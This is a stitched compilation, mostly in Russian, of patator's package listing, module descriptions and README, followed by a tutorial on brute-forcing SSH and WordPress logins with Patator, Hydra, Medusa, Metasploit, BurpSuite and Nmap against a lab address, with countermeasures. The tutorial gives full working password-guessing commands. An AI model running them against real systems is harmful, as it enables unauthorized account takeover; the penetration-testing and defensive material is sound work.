- Packages and Binaries:
- patator
- Инструменты Kali Linux
- Список инструментов для тестирования на проникновение и их описание
- patator
- Описание patator
- Особенности patator
- Справка по patator
- Ключевые слова, действия и условия, сбои
- Patator kali linux ���������
- About
- Brute-force атаки с использованием Kali Linux
- Brute-force SSH
- Противодействие
- Brute-force WordPress
- Противодействие
- Заключение
Packages and Binaries:
patator
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Currently it supports the following modules:
- ftp_login : Brute-force FTP
- ssh_login : Brute-force SSH
- telnet_login : Brute-force Telnet
- smtp_login : Brute-force SMTP
- smtp_vrfy : Enumerate valid users using SMTP VRFY
- smtp_rcpt : Enumerate valid users using SMTP RCPT TO
- finger_lookup : Enumerate valid users using Finger
- http_fuzz : Brute-force HTTP
- ajp_fuzz : Brute-force AJP
- pop_login : Brute-force POP3
- pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
- imap_login : Brute-force IMAP4
- ldap_login : Brute-force LDAP
- dcom_login : Brute-force DCOM
- smb_login : Brute-force SMB
- smb_lookupsid : Brute-force SMB SID-lookup
- rlogin_login : Brute-force rlogin
- vmauthd_login : Brute-force VMware Authentication Daemon
- mssql_login : Brute-force MSSQL
- mysql_login : Brute-force MySQL
- mysql_query : Brute-force MySQL queries
- rdp_login : Brute-force RDP (NLA)
- pgsql_login : Brute-force PostgreSQL
- vnc_login : Brute-force VNC
- dns_forward : Forward DNS lookup
- dns_reverse : Reverse DNS lookup
- snmp_login : Brute-force SNMP v1/2/3
- ike_enum : Enumerate IKE transforms
- unzip_pass : Brute-force the password of encrypted ZIP files
- keystore_pass : Brute-force the password of Java keystore files
- umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
- tcp_fuzz : Fuzz TCP services
- dummy_test : Testing module
Installed size: 184 KB
How to install: sudo apt install patator
- default-jre
- ldap-utils
- python3
- python3-ajpy
- python3-dnspython
- python3-impacket
- python3-ipy
- python3-mysqldb
- python3-openssl
- python3-paramiko
- python3-psycopg2
- python3-pyasn1
- python3-pycryptodome
- python3-pycurl
- python3-pysnmp4
- unzip
Источник
Инструменты Kali Linux
Список инструментов для тестирования на проникновение и их описание
patator
Описание patator
Patator – это многоцелевой брут-форсер, с модульным дизайном и гибким использованием.
Patator был написан из-за неудовлетворённости от работы с Hydra, Medusa, Ncrack, модулями Metasploit и скриптами NSE Nmap, которые применяются для атак по угадыванию паролей. Автор patator выбрал другой подход, чтобы не создавать ещё один инструмент по брутфорсу, который бы повторял те же самые недостатки. Patator — это многопоточный инструмент, написанный на Python, который стремиться быть более надёжным и гибким, чем его коллеги предшественники.
Неудовлетворённость существующими программами была вызвана следующими их недостатками:
- они не работают или работают ненадёжно (несколько раз в прошлом они выдавали ложноотрицательные результаты)
- они недостаточно гибкие (как сделать перебор по всем спискам слов, подставить любой параметр модуля)
- у них отсутствуют полезные функции (отображение прогресса или пауза во время выполнения)
Patator — это НЕ дружелюбный для новичков инструмент. Чтобы грамотно его использовать нужно изучить доступные примеры.
В настоящее время поддерживаются следующие модули:
- ftp_login : Брут-форс FTP
- ssh_login : Брут-форс SSH
- telnet_login : Брут-форс Telnet
- smtp_login : Брут-форс SMTP
- smtp_vrfy : Перечисление валидных пользователей с использованием SMTP VRFY
- smtp_rcpt : Перечисление валидных пользователей с использованием SMTP RCPT TO
- finger_lookup : Перечисление валидных пользователей с использованием Finger
- http_fuzz : Брут-форс HTTP
- ajp_fuzz : Брут-форс AJP
- pop_login : Брут-форс POP3
- pop_passd : Брут-форс poppassd (http://netwinsite.com/poppassd/)
- imap_login : Брут-форс IMAP4
- ldap_login : Брут-форс LDAP
- smb_login : Брут-форс SMB
- smb_lookupsid : Брут-форс SMB SID-lookup
- rlogin_login : Брут-форс rlogin
- vmauthd_login : Брут-форс демона аутентификации VMware
- mssql_login : Брут-форс MSSQL
- oracle_login : Брут-форс Oracle
- mysql_login : Брут-форс MySQL
- mysql_query : Брут-форс запросов MySQL
- rdp_login : Брут-форс RDP (NLA)
- pgsql_login : Брут-форс PostgreSQL
- vnc_login : Брут-форс VNC
- dns_forward : Прямой поиск DNS
- dns_reverse : Обратный поиск DNS
- snmp_login : Брут-форс SNMP v1/2/3
- ike_enum : Перечисление преобразований IKE
- unzip_pass : Брутфорс паролей зашифрованных файлов ZIP
- keystore_pass : Брутфорс паролей файлов хранилища ключей Java
- sqlcipher_pass : Брутфорс паролей баз данных SQL с шифрованием Cipher
- umbraco_crack : Взлом хешей паролей Umbraco HMAC-SHA1
- tcp_fuzz : Фаззинг TCP служб
- dummy_test : Модуль тестирования
Модули, которые будут реализованы в будущем:
- rdp_login с/без NLA
Особенности patator
- Нет ложных срабатываний, поскольку в своих решениях, игнорировать ли результат, программа основывается на:
- коде статуса ответа
- размере ответа
- совпадении строки или резулярного выражение в ответе
- …смотрите —help
- модульный дизайн
- не ограничена сетевыми модулями (например, есть модуль unzip_pass)
- не ограничена брут-форсингом (например, есть удалённое тестирование эксплойтов или зондирование уязвимой версии)
- интерактивное выполнение
- показ прогресса во время выполнения (нажмите Enter)
- пауза/возобновление выполнения (нажмите p)
- увеличить/уменьшить вербальность
- добавить новые действия и условия во время работы программы (например, для исключения большего типа ответов из показа)
- …нажмите h, чтобы увидеть все доступные интерактивные команды
- Использование постоянных соединений (например, будет протестировано несколько паролей до разъединения с сервером)
- Многопоточность
- Гибкий пользовательский ввод
- Могут быть подставлены любые параметры:
- используйте ключевое слово FILE для перебора файлов
- используйте ключевое слово COMBO для перебора по комбинированным файлам
- используйте ключевое слово NET для перебора каждого хоста сети, подсети
- используйте ключевое слово RANGE для перебора шестнадцатеричных, десятичных или алфавитных диапазонов
- используйте ключевое слово PROG для перебора вывода внешних программ
- Может быть сделан перебор по объединённым спискам слов в любом порядке
- Сохраните каждый ответ (во время запроса) в отдельные файлы журналов для дальнейшего изучения
Автор: Sebastien MACKE
Справка по patator
Информация об использовании:
Есть глобальные опции и опции модулей:
Все опции модулей поддерживают подстановку:
Ключевые слова (FILE, COMBO, NET, …) играют роль заполнителей. Они служат индикатором типов списков слов и показывают, куда нужно подставить вместо них настоящие слова для тестирования.
Каждое ключевое слово имеет номер для того, чтобы:
- соответствовать должному списку слов
- и показать в каком порядке делать перебор по всем словарям
Например, это будет классический порядок:
А ведь было бы более разумно:
Доступные интерактивные команды
Ключевые слова, действия и условия, сбои
Ключевые слова
Брут-форс списка хостов с файлом, содержащим комбинированные записи (каждая строка => login:password).
Сканирование подсети просто чтобы собрать баннеры версий.
Подстановка параметров, полученных перебором диапазона величин.
Подстановка параметров, полученных перебором вывода внешней программы.
Действия и условия
Используйте опцию -x для указания действия во время получения ожидаемого результата. Например:
Чтобы игнорировать ответы с кодом статуса 200 И размером в заданном диапазоне.
Чтобы игнорировать ответы с кодом статуса 500 ИЛИ содержащем «Internal error».
Помните, что условия объединяются логическим И внутри одной опции -x, если использовано несколько опций -x, то они объединяются логическим ИЛИ.
Сбои
Во время выполнения могут случаться сбои (фейлы), к примеру, такие как таймаут соединения TCP. По определению, сбой — это исключение, которое модуль не ожидал и, как результат, исключение перехватывается вышестоящим контроллером. Такие исключения или сбои не сообщаются немедленно пользователю, контроллер будет пробовать ещё 4 раза (смотрите —max-retries) перед сообщение пользователю о сбое в работе с уровнем журналирования «FAIL«.
Источник
Patator kali linux ���������
Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python, that strives to be more reliable and flexible than his fellow predecessors.
Currently it supports the following modules:
The name «Patator» comes from this.
Patator is NOT script-kiddie friendly, please read the full README inside patator.py before reporting.
Please donate if you like this project! 🙂
- FTP : Enumerating users denied login in vsftpd/userlist
Tested against vsftpd-3.0.2-9 on CentOS 7.0-1406 .
- SSH : Time-based user enumeration
Tested against openssh-server 1:6.0p1-4+deb7u2 on Debian 7.8 .
- HTTP : Brute-force phpMyAdmin logon
Payload #72 was a false positive due to an unexpected error message:
Tested against phpMyAdmin 4.2.7.1 .
- IKEv1 : Enumerate transforms supported by VPN peer
Also notice that test.hsc.fr. is the start of a new zone because we got NOERROR and no IP address.
- DNS : Reverse lookup two netblocks owned by Google
- ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR)
Bundling on Windows 5.2.3790 x86
Install python-2.7.9.msi from Python. Install pywin32-219.win32-py2.7.exe from PyWin32. Install vcredist_x86.exe from Microsoft. Install Git-1.9.5.exe from Git (and select «Use Git from Windows Command Prompt» during install). Add c:\Python27;c:\Python27\Scripts to your PATH .
The resulting stand-alone patator.exe executable was confirmed to run successfully on Windows 2003 (5.2.3790), Windows 7 (6.1.7600), Windows 2008 R2 SP1 (6.1.7601) and Windows 2012 R2 (6.3.9600), and is likely to work fine on other Windows versions.
Refer to #50 for more info.
About
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Источник
Brute-force атаки с использованием Kali Linux
Brute-force (атака полным перебором) – метод решения математических задач, сложность которого зависит от количества всех возможных решений. Сам же термин brute-force обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису.
Рассмотрим инструменты, которые можно использовать для выполнения brute-force атак на SSH и WEB-сервисы, доступные в Kali Linux (Patator, Medusa, Hydra, Metasploit), а также BurpSuite.
Все материалы, предоставленные в рамках данной статьи, предназначены для использования исключительно в учебных целях. Использование материалов в противоправных и противозаконных запрещено.
Brute-force SSH
Для примера возьмем тестовую машину 192.168.60.50 и попробуем подобрать пароль пользователя test по SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt.
Patator
Для подбора пароля средствами Patator используем команду:
patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’
где:
ssh_login — необходимый модуль
host – наша цель
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора
password – словарь с паролями
-x ignore:mesg=’Authentication failed’ — команда не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.
Hydra
Для подбора пароля используя Hydra выполним команду:
hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50
где:
-V – показывать пару логин+пароль во время перебора
-f – остановка как только будет найден пароль для указанного логина
-P – путь до словаря с паролями
ssh://192.168.60.50 – указание сервиса и IP-адрес жертвы
Medusa
Для подбора пароля с использованием Medusa выполним команду:
medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6
где:
-h – IP-адрес жертвы
-u – логин
-P – путь к словарю
-M – выбор модуля
-f – остановка после нахождения валидной пары логин/пароль
-v – настройка отображения сообщений на экране во время процесса подбора
Metasploit
Произведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_login и получили ответ:
Для просмотра необходимых параметров, воспользуемся командой show options . Для нас это:
rhosts – IP-адрес жертвы
rport – порт
username – логин SSH
userpass_file – путь до словаря
stop_on_success – остановка, как только найдется пара логин/пароль
threads – количество потоков
Указание необходимых параметров производится через команду «set«.
set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22
Указав необходимые параметры набираем команду «run» и ждем.
Противодействие
Ограничить количество устанавливаемых соединений с использованием межсетевого экрана. Пример настройки iptables:
-A INPUT -i eth0 -p tcp —dport 22 -m connlimit —connlimit-above 1 —connlimit-mask 32 -j REJECT —reject-with tcp-reset .
Такое правило установит ограничение доступа к SSH для каждого IP-адреса до 1 соединения в секунду, значительно усложнив перебор. Также эффективным решением может быть использование двухфакторной аутентификации (например, используя eToken) или аутентификации с использованием ключевой пары, а также использование ACL на основе IP-адресов.
Brute-force WordPress
Рассмотрим другой пример — подбор пароля окна авторизации веб-формы.
Для примера будем подбирать пароль от учетной записи администратора wordpress.
BurpSuite
Для начала нам необходимо понять, как происходит процесс авторизации. Для этого мы будем использовать BurpSuite. Нам необходимо попробовать авторизоваться с любым паролем и логином, чтобы посмотреть какие запросы проходят через BurpSuite.
Отлично, мы увидели POST запрос для авторизации с ним мы и будем работать.
В BODY указано какой логин и пароль проверялись, а значит, мы можем попробовать самостоятельно подставить нужные нам значения.
Передаем этот запрос в Intruder и там выбираем необходимые параметры для атаки. В пункте Payload Positions тип атаки оставляем sniper, но для проверки оставляем только параметр pwd. Таким образом, при атаке будет изменяться только этот параметр.
Загружаем необходимый словарь и начинаем атаку.
Из поведения веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После перебора словаря, видим, что один из паролей дал ответ с кодом 302 — он и является верным.
Данный метод перебора занимает намного больше времени, чем при использовании Patator, Hydra, Medusa и т.д. Даже с учетом того, что мы взяли небольшой словарь, BurpSuite перебирал словарь около 40 минут.
Hydra
Попробуем подобрать пароль с помощью Hydra.
Как мы уже знаем, при неверной авторизации возвращается код 200, а при успешной – 302. Попробуем использовать эту информацию.
Для запуска используем команду:
hydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m «/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302»
Здесь мы указываем обязательные параметры:
-l – имя пользователя
-P – словарь с паролями
-t – количество потоков
http-post-form – тип формы, у нас POST.
/wp-login.php – это URL страницы с авторизацией
^USER^ — показывает куда подставлять имя пользователя
^PASS^ — показывает куда подставлять пароль из словаря
S=302 – указание на какой ответ опираться Hydra. В нашем случае, ответ 302 при успешной авторизации.
Patator
Как мы уже знаем, при неудачной авторизации возвращается код 200, а при удачной – 302. Будем использовать тот же принцип, что и с Hydra:
Запуск производится командой:
patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body=’log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1′ 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1
http_fuzz – модуль для brute-force атаки http
url – адрес страницы с авторизацией
FILE0 — путь до словаря с паролями
body – информация, которая передается в POST запросе при авторизации
-t — количество потоков
-x – В данном случае мы указали команду не выводить на экран сообщения строки, содержащие параметр с кодом 200
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос
Как итог – нам удалось подобрать пароль.
Nmap
Утилита Nmap позволяет в том числе производить подбор паролей для веб-форм авторизации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:
—script-args – добавление аргументов
user или userdb – логин или файла с логинами
pass или passdb — указание пароля или словаря
thread – количество потоков
firstonly=true – выводить результат после первого же правильного пароля
nmap 192.168.60.50 —script http-wordpress-brute —script-args ‘user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true’
Противодействие
Ограничить (усложнить) brute-force атаки на web-приложения можно средствами iptables (по аналогии с SSH) и средствами nginx. Для этого необходимо создать зону лимитов:
.
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
.
и задействовать ее:
location / <
.
limit_req zone=req_limits burst=10;
limit_req_status 429;
.
>
Такие настройки позволят ограничить количество запросов с одного IP-адреса до 40 в секунду.
Усложнить задачу перебора можно используя следующие методы:
— Применение межсетевого экрана и прочего ПО для ограничения количества обращений к защищаемому сервису. О том, как мы используем машинное обучение для выявления подобных атак (в том числе распределенных), можно почитать в статье.
— Использование средств, препятствующих быстрой проверке корректности ключа (например, Captcha).
Заключение
В данной статье мы поверхностно рассмотрели некоторые популярные инструменты. Сократить риск подбора пароля можно, следуя следующим рекомендациям:
— используйте устойчивые к подбору пароли;
— не создавайте пароли, используя личную информацию, например: дату рождения или имя + дата рождения или мобильный телефон;
— регулярно меняйте пароль;
— на всех аккаунтах применяйте уникальные пароли.
Подобные рекомендации (как и рекомендации по безопасной веб-разработке) мало кто соблюдает, поэтому необходимо использовать различные программные решения, позволяющие:
— ограничить подключение по IP-адресу, или, если это невозможно, ограничить одновременное количество соединений с сервисом (средствами iptables, nginx и прочими);
— использовать двухфакторную аутентификацию;
— выявлять и блокировать подобные атаки средствами SIEM, WAF или другими (например, fail2ban).
Источник